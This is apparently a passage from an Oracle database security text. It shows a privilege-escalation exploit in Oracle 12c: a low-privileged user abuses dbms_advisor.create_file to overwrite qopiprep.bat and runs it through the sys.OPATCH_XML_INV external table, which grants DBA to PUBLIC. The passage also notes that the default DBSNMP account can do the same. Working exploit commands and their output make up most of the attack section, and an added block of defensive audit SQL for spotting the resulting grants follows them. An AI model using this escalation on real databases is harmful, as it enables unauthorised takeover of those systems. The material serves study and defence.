Database Reference
In-Depth Information
ADVTEST@192.168.1.2:1522/orcl4>exec dbms_advisor.create_file('C:\app\abfb378\product\12.1.0\
dbhome_1\BIN\sqlplus / as sysdba @C:\app\abfb378\product\12.1.0\dbhome_1\QOpatch\grant.sql',
'OPATCH_SCRIPT_DIR','qopiprep.bat');
PL/SQL procedure successfully completed.
ADVTEST@192.168.1.2:1522/orcl4>select * from sys.OPATCH_XML_INV;
ERROR:
ORA-29913: error in executing ODCIEXTTABLEFETCH callout
ORA-29400: data cartridge error
KUP-04095: preprocessor command
C:\app\abfb378\product\12.1.0\dbhome_1/QOpatch\qopiprep.bat encountered error
"Error 45 initializing SQL*Plus
Internal error
"
no rows selected
Despite the SQL*Plus error, the code has actually granted DBA to PUBLIC, as can be seen next:
ADVTEST@192.168.1.2:1522/orcl4>select * from user_role_privs where username='PUBLIC';
USERNAME
--------------------------------------------------------------------------------
GRANTED_ROLE
--------------------------------------------------------------------------------
ADM DEF OS_ COM
--- --- --- ---
PUBLIC
DBA
NO YES NO NO
So the ambitious user has gained the DBA role, and can therefore change the SYS password.
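A defender's audit for the state shown above, as an added example that is not part of the original text. It assumes a session that can read the DBA_* dictionary views, and it uses only the object names seen on this page (OPATCH_SCRIPT_DIR, SYS.OPATCH_XML_INV) plus the ADVISOR system privilege, which Oracle documents as required to use DBMS_ADVISOR; the names adv_direct and adv_reach are made up for the query.

```sql
-- Added audit example (not from the original text).
-- Run as a user that can read the DBA_* dictionary views.

-- 1. Roles granted to PUBLIC. The transcript above ends with DBA in this list.
SELECT granted_role, admin_option, default_role
  FROM dba_role_privs
 WHERE grantee = 'PUBLIC'
 ORDER BY granted_role;

-- 2. Grantees that reach the ADVISOR system privilege, directly or through
--    nested roles. Rows with a NULL account_status are roles or PUBLIC.
WITH adv_direct AS (
  SELECT grantee FROM dba_sys_privs WHERE privilege = 'ADVISOR'
),
adv_reach AS (
  SELECT grantee FROM adv_direct
  UNION
  SELECT grantee
    FROM dba_role_privs
   START WITH granted_role IN (SELECT grantee FROM adv_direct)
 CONNECT BY NOCYCLE PRIOR grantee = granted_role
)
SELECT r.grantee, u.account_status
  FROM adv_reach r
  LEFT JOIN dba_users u ON u.username = r.grantee
 ORDER BY r.grantee;

-- 3. Where the directory object used above points, and who holds
--    READ / WRITE / EXECUTE on it.
SELECT directory_name, directory_path
  FROM dba_directories
 WHERE directory_name = 'OPATCH_SCRIPT_DIR';

SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE table_name = 'OPATCH_SCRIPT_DIR'
 ORDER BY grantee, privilege;

-- 4. Who can query the external table, and the access parameters
--    (including any preprocessor clause) it is defined with.
SELECT grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS' AND table_name = 'OPATCH_XML_INV'
 ORDER BY grantee;

SELECT default_directory_name, access_parameters
  FROM dba_external_tables
 WHERE owner = 'SYS' AND table_name = 'OPATCH_XML_INV';
```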
So which users can take advantage of this vulnerability by default? One of them is DBSNMP. As shown below,
DBSNMP will write an SQL script to the OS that grants itself DBA, then overwrite the pre-existing qopiprep.bat with a
command to execute that script, and finally execute qopiprep.bat through the pre-existing external table, which
is named sys.OPATCH_XML_INV.
C:\app\abfb378\product\12.1.0\dbhome_1\BIN> sqlplus dbsnmp/dbsnmp@orcl4 (CDB) .
SQL*Plus: Release 12.1.0.1.0 Production on Sat Aug 3 02:50:52 2013
Copyright (c) 1982, 2013, Oracle. All rights reserved.
Last Successful login time: Sat Aug 03 2013 02:48:37 +01:00
Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics and Real Application Testing options
 